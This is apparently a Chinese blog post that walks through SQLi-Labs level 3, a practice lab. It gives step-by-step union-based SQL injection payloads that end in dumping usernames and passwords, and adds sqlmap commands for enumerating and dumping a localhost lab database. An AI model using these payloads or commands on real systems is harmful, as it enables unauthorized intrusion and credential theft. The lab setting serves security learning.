sqli靶场学习记录-第三关

第三关和前面两关没有太大的区别,只是数据访问的方式不一样

1、判断是否存在注入点

1') and 1=1 -- qq

1') and 1=2 -- qq

 

第三关和前两关的区别在于查询数据的方式是1'),注意-- qq之间一定要有空格,网页编译中--空格代表注释,意在将后面的内容注释掉

2、判断字段数

1') order by 3-- qq 


1') order by 4-- qq

 3、判断回显点

0') union select 1,2,3 -- qq

 4、查询数据库版本号和当前数据库名

0') union select 1,database(),version() -- qq

5、爆表

0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- qq

 

6、爆字段名

 0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- qq

7、查询表格内容

0') union select 1,group_concat(username),group_concat(password) from users -- qq 

@-@ 

### SQLMap在SQLi-Labs第一关中的应用 对于SQLi-Labs靶场的第一关(Less-1),可以通过`sqlmap`工具实现自动化的SQL注入攻击。以下是具体的操作方法以及注意事项: #### 工具准备 确保已安装并配置好`sqlmap`环境。如果尚未安装,可通过以下命令完成安装: ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap cd sqlmap ``` #### 基本操作流程 针对SQLi-Labs第一关的目标URL `http://localhost/sqli-labs/Less-1/?id=1`,可以执行如下命令来探测和利用漏洞。 ##### 探测可注入参数 运行以下命令以确认是否存在SQL注入漏洞,并定位到具体的注入点: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --risk=3 --level=5 --random-agent --batch ``` 上述命令中各选项的作用分别为: - `-u`: 指定目标URL。 - `--risk=3`: 设置风险级别为最高级,尝试更多复杂的payload[^1]。 - `--level=5`: 设定测试强度为最高等级,覆盖尽可能多的场景。 - `--random-agent`: 随机化User-Agent头信息,规避可能的安全防护机制[^2]。 - `--batch`: 自动处理所有交互式提示,默认选择推荐选项[^3]。 ##### 枚举数据库信息 一旦确认存在注入漏洞,则继续深入挖掘敏感数据。例如枚举当前使用的数据库名称: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db --batch ``` 此命令会返回当前正在使用的数据库名字。 ##### 列出所有可用数据库 为了进一步了解服务器上的其他潜在资源,还可以列举全部数据库列表: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs --batch ``` 通过该命令可以获得完整的数据库集合。 ##### 查找特定数据库内的表格结构 假设已经得知某个感兴趣的具体数据库名为`testDB`,那么就可以查询其内部包含哪些表单: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB --tables --batch ``` 这里指定了目标数据库并通过`--tables`获取其中存储的数据表清单。 ##### 提取指定表的内容列定义 当明确了某张表之后,下一步便是研究它的字段构成情况: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --columns --batch ``` 这条语句用于揭示所选表(`users`)的各项属性描述。 ##### 导出实际记录值 最后一步就是导出整张表里的真实数据条目了: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --dump --batch ``` 至此完成了从发现漏洞直至提取有用情报的一系列动作。 ### 注意事项 尽管`sqlmap`功能强大,但在实战环境中需谨慎行事,避免触犯法律红线。仅限于授权范围内的渗透测试活动才允许使用此类技术手段。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值